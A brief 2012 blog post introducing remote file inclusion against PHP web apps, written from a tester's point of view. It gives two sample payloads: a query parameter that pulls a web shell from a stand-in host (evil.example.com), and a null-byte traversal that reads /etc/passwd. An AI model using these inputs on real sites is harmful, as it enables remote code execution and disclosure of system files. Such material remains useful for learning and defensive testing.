Irregular Expressions

Aug 29 2012   7:50PM GMT

Remote File Inclusions

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

I am currently testing a few php shells that I have against a test php site I created, and I thought I would share some of the basics of a RFI ( Remote File Inclusion ). When I need to deal with web apps this is the second thing I will try right after SQL injection.

Here is the wikipedia article for another explanation.

In most cases I would use this to either display the contents of a file or execute another php script like a php based shell. If I am not really sure what I am looking for I will use a php based shell, something like this.

Typically what I will do is crawl the site and look for variables on each page and attempt something like this (borrowed from the wikipedia example).

/vulnerable.php?COLOR=http://evil.example.com/webshell.txt?

A very simple and powerful method to attack sites.
Also it can be used for local file traversal, instead of a remote file you can specify a local file.

/vulnerable.php?COLOR=/etc/passwd%00

In these cases the %00 is very important for your success.

 Comment on this Post

 
There was an error processing your information. Please try again later.
Thanks. We'll let you know when a new response is added.
Send me notifications when other members comment.

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to:

Share this item with your network: